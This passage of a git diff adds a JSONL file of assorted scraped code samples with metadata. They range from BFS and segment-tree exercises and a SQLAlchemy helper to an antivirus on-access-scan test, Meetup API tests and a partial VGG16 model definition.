diff --git "a/4714.jsonl" "b/4714.jsonl" new file mode 100644--- /dev/null +++ "b/4714.jsonl" @@ -0,0 +1,677 @@ +{"seq_id":"14230913","text":"# 자연수 N에 몇 번의 연산을 통해 다른 자연수 M을 만든다.\n# +1, -1, *2, -10 -> 4가지 연산이 있을 때,\n# 최소 몇번의 연산을 거쳐야 M을 만들 수 있는가?\n\n# N =2, M=7\n# (2+1)*2+1= 7 최소 3번의 연산 필요하다.\n\n# 2 7 -> 3번\n# 3 15 -> 4번\n# 36 1007 -> 8번\n\nfrom collections import deque\n\ndef operation():\n global result\n while Q:\n front, check = Q.popleft()\n if front == M:\n result = check\n return\n for i in range(4):\n if i == 0:\n if 1<= front + 1 <= 1000000 and visited[front+1] == False:\n Q.append((front+1, check+1))\n visited[front+1] = True\n elif i == 1:\n if 1<= front-1 <= 1000000 and visited[front-1] == False:\n Q.append((front-1, check+1))\n visited[front-1] = True\n elif i == 2:\n if 1 <= front * 2 <= 1000000 and visited[front*2] == False:\n Q.append((front*2, check+1))\n visited[front*2] = True\n elif i == 3:\n if i<= front-10 <=1000000 and visited[front-10] ==False:\n Q.append((front-10, check+1))\n visited[front-10] = True\n\nT = int(input())\nfor tc in range(1, T+1):\n N, M = map(int, input().split())\n result = 0\n visited = [False] * 1000001\n Q = deque()\n Q.append((N, 0))\n operation()\n\n print(\"#{} {}\".format(tc, result))","sub_path":"SWEA/advanced/그래프기본과 탐색/연산.py","file_name":"연산.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636699037","text":"def get_checksum(spreadsheet):\n \"\"\"\n :param spreadsheet: list: of lists of numbers\n :return: sum of the differences between max & min in each row\n \"\"\"\n cumulative_checksum = 0\n for row in spreadsheet:\n diff = max(row) - min(row)\n cumulative_checksum += diff\n return cumulative_checksum\n\n\nif __name__ == '__main__':\n raw_spreadsheet = open('raw_spreadsheet.txt').readlines()\n spreadsheet = []\n for row in raw_spreadsheet:\n spreadsheet.append([int(v) for v in row.split('\t')])\n print('checksum: ' + str(get_checksum(spreadsheet)))\n","sub_path":"advent2017/day02/corruption_checksum.py","file_name":"corruption_checksum.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47639769","text":"#! 
/usr/bin/python3\n\ndef count_twos(limit):\n \"\"\"\n Accept a number and count the number of appearances of \"2\" digits.\n \"\"\"\n\n count = 0\n\n for integer in range(limit + 1):\n count += str(integer).count('2')\n\n print('%i (is the number of appearances of \"2\" between 0 and %i)' \n % (count, limit))\n\n\nif __name__ == \"__main__\":\n import sys, timeit\n \n # Sanity check CLI command.\n if len(sys.argv) >= 2:\n print(timeit.timeit(\"count_twos(int(sys.argv[1]))\", setup=\"from __main__ import count_twos\", number=10))\n #count_twos(int(sys.argv[1]))\n else:\n print('Please enter a number.')\n","sub_path":"sendbloom/count_twos_v2.py","file_name":"count_twos_v2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"239782669","text":"from sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nfrom Station import Station\n\nclass Database(object):\n\n def __init__(self):\n self.dbLocation = 'mysql+pymysql://root@localhost/MPD_MANAGEMENT'\n self.session = self.createSession()\n\n def createSession(self):\n engine = create_engine(self.dbLocation)\n Session = sessionmaker(bind=engine)\n session = Session()\n return session\n\n def storeStation(self, station):\n self.session.add(station)\n self.session.commit()\n\n def removeStation(self, station):\n (self.session.query(Station).filter_by(name=station.getName())).delete()\n self.session.commit()\n\n def getActiveStations(self):\n stations = self.session.query(Station).all()\n return stations\n\n def getStation(self, name):\n station = (self.session.query(Station).filter_by(name=name)).first()\n if station is not None:\n print('retrieving' + station.getName())\n return station\n raise NameError\n\n def checkStored(self, name):\n print('checking ' + name)\n if (self.session.query(Station).filter_by(name=name)).count():\n return True\n else:\n return False\n\n def getFreeSlot(self): # Poor time complexity, fix\n stations = self.session.query(Station).all()\n takenPorts = []\n for station in stations:\n takenPorts.append(int(station.httpPort) - 8000)\n\n for i in range(0, 100):\n if i not in takenPorts:\n return i\n\n \n def updateState(self, obj):\n self.session.merge(obj)\n self.session.commit()","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"34088460","text":"from components.ui.help_window import Ui_HelpWindow\nfrom components.window import SubWindow\n\n\nclass HelpDoc(SubWindow):\n\n def __init__(self, name='HelpDoc', parent=None):\n super().__init__(name, parent, Ui_HelpWindow())\n with open(\"Readme.md\", \"r\", encoding=\"utf-8\") as input_file:\n text = input_file.read()\n self.ui.textBrowser.setMarkdown(text)\n","sub_path":"components/help_doc.py","file_name":"help_doc.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"116188783","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. 
All rights reserved.\n# TestcaseID: lsh-678\n# TestcaseDescription: Scanning a program/joke on read,write and execute with read,write and execute pe\n\nimport sys\nimport logging\nimport shutil\nimport subprocess\n# Add common folder into the sys path for module importing\nsys.path.append(\"../../Common\")\nsys.path.append('..')\nimport commonAntiMalwareFns\nimport commonOASFns\nimport commonFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : lsh-678\")\n logging.info(\"Description : Scanning a program/joke on read,write and execute with read,write and execute pe\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n self._joke_file_source = self.getConfig('PAYLOAD_PATH') + '/jokes/COMJOKE.COM'\n self._joke_file_target = os.path.dirname(os.path.abspath(sys.argv[0])) + '/lsh-678'\n self._original_dat =\"/opt/NAI/LinuxShield/engine/dat\"\n self._original_old_dat =\"/opt/NAI/LinuxShield/engine/dat_old\"\n self._eit_dat=self.getConfig('PAYLOAD_PATH') + '/jokes/dat'\n if self._cleanup() != 0 :\n return 1 \n if not os.path.exists(self._joke_file_source) :\n logging.error(\"Payload directory does not exist.\")\n return 1\n if not os.path.exists(self._joke_file_target) :\n os.mkdir(self._joke_file_target)\n if not commonOASFns.disableOAS() :\n logging.error(\"Failed to disable OAS for payload copy\")\n return 1\n try :\n logging.debug(\"Copying the payload\")\n shutil.move(self._original_dat,self._original_old_dat)\n shutil.copytree(self._eit_dat,self._original_dat)\n except :\n logging.error(\"Failed to copy the payload\")\n return 1\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n try :\n logging.debug(\"Copying the payload\")\n shutil.copy(self._joke_file_source, self._joke_file_target)\n except :\n logging.error(\"Failed to copy as expected\")\n return 1\n if not commonOASFns.setOASPrimaryAction(\"Rename\"):\n logging.error(\"failed to set primary action\")\n return 1\n if not commonOASFns.setOASSecondaryAction(\"Delete\"):\n logging.error(\"failed to set secondry action\")\n return 1\n if not commonOASFns.enableOAS() :\n logging.error(\"Failed to enable OAS after payload copy\")\n return 1\n self._jokefile_path= self._joke_file_target+\"/\"+\"COMJOKE.COM\"\n _p =subprocess.call([\"file\",self._jokefile_path])\n if _p!=0:\n logging.info(\"file comand failed as expected\")\n return 0\n return 0 \n \n def verify(self):\n if os.path.exists(self._jokefile_path):\n loggging.error(\"file has to be delete\")\n return 1\n logging.info(\"Verifying testcase %s\" % testcaseName)\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n foundCrash = foundCrash + self._cleanup()\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. 
Maybe a product crash\")\n\n return foundCrash\n \n def _cleanup(self):\n _retval = 0\n logging.debug(\"Resetting to defaults\")\n if not commonAntiMalwareFns.resetToDefaults() :\n logging.error(\"Failed to reset to defaults\")\n _retval = 1\n logging.debug(\"Removing the macro target directory\")\n #if os.path.exists(self._joke_file_target) :\n #shutil.rmtree(self._joke_file_target)\n if os.path.exists(self._original_old_dat) :\n shutil.rmtree(self._original_dat)\t\t\n shutil.move(self._original_old_dat,self._original_dat)\n return _retval\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Antimalware/OAS/OAS_Scan_Actions_4.py","file_name":"OAS_Scan_Actions_4.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528496236","text":"\n# 参考: https://qiita.com/takayg1/items/c811bd07c21923d7ec69\n# 単位元 と 結合法則 (交換則は成り立たなくてOK) が必要! それらがあれば O(N)→O(log N) にできる.)\nclass SegTree:\n \"\"\"\n init(init_val, ide_ele): 配列init_valで初期化 O(N)\n update(k, x): k番目の値をxに更新 O(logN)\n query(l, r): 区間[l, r)をsegfuncしたものを返す O(logN)\n \"\"\"\n def __init__(self, init_val, segfunc, ide_ele):\n \"\"\"\n init_val: 配列の初期値\n segfunc: 区間にしたい操作\n ide_ele: 単位元\n n: 要素数\n num: n以上の最小の2のべき乗\n tree: セグメント木(1-index)\n \"\"\"\n n = len(init_val)\n self.segfunc = segfunc\n self.ide_ele = ide_ele\n self.num = 1 << (n - 1).bit_length()\n self.tree = [ide_ele] * 2 * self.num\n # 配列の値を葉にセット\n for i in range(n):\n self.tree[self.num + i] = init_val[i]\n # 構築していく\n for i in range(self.num - 1, 0, -1):\n self.tree[i] = self.segfunc(self.tree[2 * i], self.tree[2 * i + 1])\n\n def update(self, k, x):\n \"\"\"\n k番目の値をxに更新\n k: index(0-index)\n x: update value\n \"\"\"\n k += self.num\n self.tree[k] = x\n while k > 1:\n self.tree[k >> 1] = self.segfunc(self.tree[k], self.tree[k ^ 1])\n k >>= 1\n\n def query(self, l, r):\n \"\"\"\n [l, r)のsegfuncしたものを得る\n l: index(0-index)\n r: index(0-index)\n \"\"\"\n res = self.ide_ele\n\n l += self.num\n r += self.num\n while l < r:\n if l & 1:\n res = self.segfunc(res, self.tree[l])\n l += 1\n if r & 1:\n res = self.segfunc(res, self.tree[r - 1])\n l >>= 1\n r >>= 1\n return res\n","sub_path":"library/SegTree.py","file_name":"SegTree.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270077549","text":"# use dummy head.\n# store previous. 
\n# head of reverse\n# next \n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseBetween(self, head: ListNode, m: int, n: int) -> ListNode:\n dummy = ListNode(None)\n dummy.next = head\n current = head\n prev = dummy\n nextt = dummy # record current's original next\n reverse_head = dummy # record prev to m'th \n reverse_last = dummy # record m'th\n counter = 1\n while current is not None:\n nextt = current.next\n if counter == m:\n reverse_head = prev\n reverse_last = current\n elif counter > m and counter < n:\n current.next = prev\n elif counter == n:\n # fix reverse head\n nextt = current.next\n current.next = prev \n reverse_head.next = current\n reverse_last.next = nextt\n break\n prev = current \n current = nextt\n counter += 1\n return dummy.next\n\nhead = ListNode(1)\nhead.next = ListNode(2)\nhead.next.next = ListNode(3)\nhead.next.next.next = ListNode(4)\nhead.next.next.next.next = ListNode(5)\nm = 2\nn = 4\nhead = Solution().reverseBetween(head, m, n)\nwhile head is not None:\n print(head.val)\n head = head.next","sub_path":"leetcode1-115/92. Reverse Linked List II.py","file_name":"92. Reverse Linked List II.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300682137","text":"import numpy as np\nimport cv2\nimport time\n\npath = \"img_test/space/\"\nname = \"space\" + str(4) + \".jpg\"\nimg_path = path + name\ndebug = True\n\nimg = cv2.imread(img_path)\nimg = cv2.resize(img, (700, 400))\ncopy = img\nshape = list(img.shape)\n\n\n#\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n# 105\nsensitivity = 90\nlower_white = np.array([0, 0, 255 - sensitivity])\nupper_white = np.array([255, sensitivity, 255])\nmask = cv2.inRange(hsv, lower_white, upper_white)\nimg = cv2.bitwise_and(img, img, mask=mask)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('test', img)\ncv2.waitKey()\ncv2.imwrite(path + 'result/' + name, img)\n","sub_path":"recognition/discover_space.py","file_name":"discover_space.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"399859597","text":"# Python script to calculate the distance measures (features) for all of the tracked face data\n# \nimport os\n\n# Supporting method to calculate distance between two points\ndef distance_between(n1, n2):\n\treturn (abs(n1[0] - n2[0])**2 + abs(n1[1] - n2[1])**2)**0.5\n\n# Supporting method to calculate midpoint of two points\ndef point_between(n1, n2):\n\tx = [n1[0], n2[0]]\n\ty = [n1[1], n2[1]]\n\treturn (abs(x[0] - x[1])/2 + min(x), abs(y[0] - y[1])/2 + min(y))\n\nemotions = {\n\t\"Angry\"\t\t: 1,\n\t\"Contempt\" \t: 2,\n\t\"Fear\" \t\t: 3,\n\t\"Happy\" \t: 4,\n\t\"Sadness\" \t: 5,\n\t\"Surprise\" \t: 6,\n\t\"Natural\" \t: 7 # Other\n}\n\ndata = {}\nfout = open(\"emotions.train\", \"w\")\nfor name in [\"Happy\", \"Sadness\", \"Surprise\", \"Angry\", \"Contempt\", \"Fear\", \"Natural\"]:\n\tdata[str(emotions[name])] = []\n\tfor sequence in os.listdir('Face data/' + name):\n\t\tdata[str(emotions[name])].append([])\n\t\tfor entry in open('Face data/' + name + \"/\" + sequence):\n\t\t\tx, y = [float(a) for a in entry.strip().replace(\" \", \" \").split(\" \")]\n\t\t\tdata[str(emotions[name])][-1].append((x, y))\n\nfor key in data:\n\tfor index in range(len(data[key])):\n\t\ti = 1\n\t\tvertex = [0.0] + 
data[key][index]\n\n\t\tfout.write(key)\n\n\t\tleft_eye = point_between(vertex[37], vertex[40])\n\t\tright_eye = point_between(vertex[43], vertex[46])\n\t\tbetween_eyes = distance_between(left_eye, right_eye)\n\t\tnose = point_between(vertex[31], vertex[34])\n\t\tfor x in range(1, 17 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(32, 36 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(37, 42 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(43, 48 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(49, 66 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(0, 5):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[18+x], vertex[27-x]) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[53], vertex[57]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[52], vertex[58]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[51], vertex[59]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[49], vertex[55]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[50], vertex[54]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[60], vertex[56]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[61], vertex[66]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[62], vertex[65]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[63], vertex[64]) / between_eyes))\n\t\tfout.write(\"\\n\")\n","sub_path":"Classifiers/database-specific multi-class/rafd/calculatefeatures.py","file_name":"calculatefeatures.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"578203656","text":"\"\"\"\nPython Runtime Validation\n\"\"\"\n\nimport logging\nimport os\nimport subprocess\n\nfrom aws_lambda_builders.exceptions import MisMatchRuntimeError\n\nLOG = logging.getLogger(__name__)\n\n\nclass PythonRuntimeValidator(object):\n SUPPORTED_RUNTIMES = {\n \"python2.7\",\n \"python3.6\",\n \"python3.7\"\n }\n\n def __init__(self, runtime):\n self.language = \"python\"\n self.runtime = runtime\n self._valid_runtime_path = None\n\n def has_runtime(self):\n \"\"\"\n Checks if the 
runtime is supported.\n :param string runtime: Runtime to check\n :return bool: True, if the runtime is supported.\n \"\"\"\n return self.runtime in self.SUPPORTED_RUNTIMES\n\n def validate(self, runtime_path):\n \"\"\"\n Checks if the language supplied matches the required lambda runtime\n :param string runtime_path: runtime to check eg: /usr/bin/python3.6\n :raises MisMatchRuntimeError: Version mismatch of the language vs the required runtime\n \"\"\"\n if not self.has_runtime():\n LOG.warning(\"'%s' runtime is not \"\n \"a supported runtime\", self.runtime)\n return\n\n cmd = self._validate_python_cmd(runtime_path)\n\n p = subprocess.Popen(cmd,\n cwd=os.getcwd(),\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n if p.returncode != 0:\n raise MisMatchRuntimeError(language=self.language,\n required_runtime=self.runtime,\n runtime_path=runtime_path)\n else:\n self._valid_runtime_path = runtime_path\n return self._valid_runtime_path\n\n def _validate_python_cmd(self, runtime_path):\n major, minor = self.runtime.replace(self.language, \"\").split('.')\n cmd = [\n runtime_path,\n \"-c\",\n \"import sys; \"\n \"assert sys.version_info.major == {major} \"\n \"and sys.version_info.minor == {minor}\".format(\n major=major,\n minor=minor)]\n return cmd\n\n @property\n def validated_runtime_path(self):\n return self._valid_runtime_path if self._valid_runtime_path is not None else None\n","sub_path":"aws_lambda_builders/workflows/python_pip/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"491697259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPURPOSE: For testing meetup models\nAUTHOR: dylangregersen\nDATE: Mon Sep 15 00:52:58 2014\n\"\"\"\n# ########################################################################### #\n\n# import modules \n\nfrom __future__ import print_function, division, unicode_literals\nimport time\nimport unittest\n\nfrom mock import MagicMock\nfrom mock import Mock\nfrom mock import patch\nimport requests\n\nfrom meetup.api import MeetupClient\n\n\nMEETUP_KEY = \"abc123\"\n\n\n# ########################################################################### #\n\n\nclass MeetupClientTests(unittest.TestCase):\n \"\"\"Tests that ensure GET requests function correctly.\n \"\"\"\n\n def setUp(self):\n self.client = MeetupClient(api_key=MEETUP_KEY)\n self.json_body = MagicMock()\n self.response_headers = {\n 'X-RateLimit-Remaining': \"14\",\n 'X-RateLimit-Reset': \"2\"\n }\n self.mock_json = Mock(return_value=self.json_body)\n self.mock_response = Mock(\n headers=self.response_headers,\n json=self.mock_json\n )\n\n @patch.object(requests, \"get\")\n def test_invoke_get_calls_requests(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"member_id\": \"12345\"\n },\n method=\"GET\"\n )\n mock_get.assert_called_once_with(\n \"https://api.meetup.com/2/groups\"\n \"?page=1000\"\n \"&key=abc123\"\n \"&member_id=12345\"\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"post\")\n def test_invoke_post_calls_requests(self, mock_post):\n mock_post.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"name\": \"Awesome Team\"\n },\n method=\"POST\"\n )\n mock_post.assert_called_once_with(\n 
\"https://api.meetup.com/2/groups\",\n data={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"name\": \"Awesome Team\"\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"delete\")\n def test_invoke_delete_calls_requests(self, mock_delete):\n mock_delete.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups/awesome-team\",\n params={\n \"id\": 72\n },\n method=\"DELETE\"\n )\n mock_delete.assert_called_once_with(\n \"https://api.meetup.com/2/groups/awesome-team\",\n params={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"id\": 72\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(time, \"sleep\")\n @patch.object(requests, \"get\")\n def test_hit_rate_limit_waits(self, mock_get, mock_sleep):\n mock_get.return_value = self.mock_response\n self.response_headers['X-RateLimit-Remaining'] = \"0\"\n self.response_headers['X-RateLimit-Reset'] = \"4\"\n self.client.invoke(\"2/groups/foo\")\n\n self.response_headers['X-RateLimit-Reset'] = \"2\"\n self.client.invoke(\"2/groups/bar\")\n self.assertEqual(2, len(mock_get.call_args_list))\n mock_sleep.assert_called_once_with(4)\n\n mock_sleep.reset_mock()\n self.client.invoke(\"2/groups/chew\")\n mock_sleep.assert_called_once_with(2)\n\n @patch.object(requests, \"get\")\n def test_get_next_page_uses_meta_to_fetch_next(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"next\": \"http://meetup.foo.co/page-2\"\n }\n }\n )\n mock_get.assert_called_once_with(\"http://meetup.foo.co/page-2\")\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n def test_get_next_page_no_next_is_none(self):\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"prev\": \"http://fifo.com/1\"\n }\n }\n )\n self.assertIsNone(result)\n\n def test_get_next_page_no_meta_is_none(self):\n result = self.client.get_next_page({})\n self.assertIsNone(result)\n\n\n\n# ########################################################################### #\nif __name__ == \"__main__\":\n unittest.main()\n \n","sub_path":"meetup/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623230834","text":"#takes the ATL zoo and converts it into .dsltrans files\n\nfrom ZipDownloader import ZipDownloader\nfrom ZipHandler import ZipHandler\nfrom ConvertATL2XMI import ConvertATL2XMI\nfrom RTEHandler import RTEHandler\nfrom ConvertATL2DSLTrans import ConvertATL2DSLTrans\n\nclass ZooConverter:\n\n def __init__(self, zip_dir, trans_dir):\n self.zip_dir = zip_dir\n self.trans_dir = trans_dir\n\n def download_zips(self, zoo_site):\n ZipDownloader(zoo_site, self.zip_dir)\n\n def separate_transformations(self):\n zh = ZipHandler(self.zip_dir, self.trans_dir)\n zh.unzip()\n\n def run_atl_to_xmi(self):\n cax = ConvertATL2XMI(self.trans_dir)\n cax.set_up()\n cax.convert()\n cax.tear_down()\n\n def run_types_trans(self):\n rte = RTEHandler(self.trans_dir)\n rte.run()\n\n def run_atl_to_dsltrans(self):\n catd = ConvertATL2DSLTrans(self.trans_dir)\n catd.set_up()\n catd.convert()\n catd.tear_down()\n\nif __name__ == \"__main__\":\n\n zoo_site = \"https://www.eclipse.org/atl/atlTransformations/\"\n zip_dir = \"./zip_dir\"\n trans_dir = \"./example_dir\"\n zc = ZooConverter(zip_dir, trans_dir)\n\n zc.download_zips(zoo_site)\n\n 
zc.separate_transformations()\n\n zc.run_atl_to_xmi()\n\n zc.run_types_trans()\n\n zc.run_atl_to_dsltrans()","sub_path":"converter/zoo_to_dsltrans.py","file_name":"zoo_to_dsltrans.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402133995","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 15 09:15:07 2020\n\n@author: Frank\n\"\"\"\n\n\n############################################################\n# DES: Define VGG16 CNN and train model.\n# Once trained, export model to working directory.\n############################################################\n\n############################################################\n# Libraries:\n############################################################\n\nimport os\n#import scripts.set_working_dir as set_wd\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import RMSprop\nimport math\nfrom itertools import product\n\n#########################################################\n# Set Working Directory:\n# - Ensure RELATIVE working directory (so it can be replicated by any user)\n# - Ensure users can read data using either Windows or UNIX folders\n# - Working directory should be '.\\scripts' for windows or './scripts' for UNIX\n#########################################################\n\n#working_dir = set_wd.set_correct_working_dir()\n\n############################################################\n# Define LeNet model:\n# - Parameters to change:\n# - - Optimisation\n# - - Loss function\n############################################################\n\n#########################################\n# Define combinations of paramters:\n#########################################\n\n# Loss functions\nloss_fns = ['binary_crossentropy', 'mean_squared_error', 'mean_squared_logarithmic_error', 'sparse_categorical_crossentropy']\n\n# Optimisation for SGD learning rate:\nopts = [0.1, 0.01, 0.001]\n\n# combinations:\ncombos = list(product(loss_fns, opts))\n\ni = combos[1]\n\n#########################################\n# Define X models (X = len(loss_fns)*len(opts)\n#########################################\n\nfor i in combos:\n\n VGG16_cnn_model = tf.keras.models.Sequential()\n VGG16_cnn_model.add(Conv2D(input_shape=(224,224,3),filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n 
